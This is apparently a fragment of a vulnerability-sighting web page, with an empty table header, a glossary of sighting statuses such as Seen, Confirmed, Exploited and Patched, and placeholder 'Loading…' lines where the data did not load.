| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…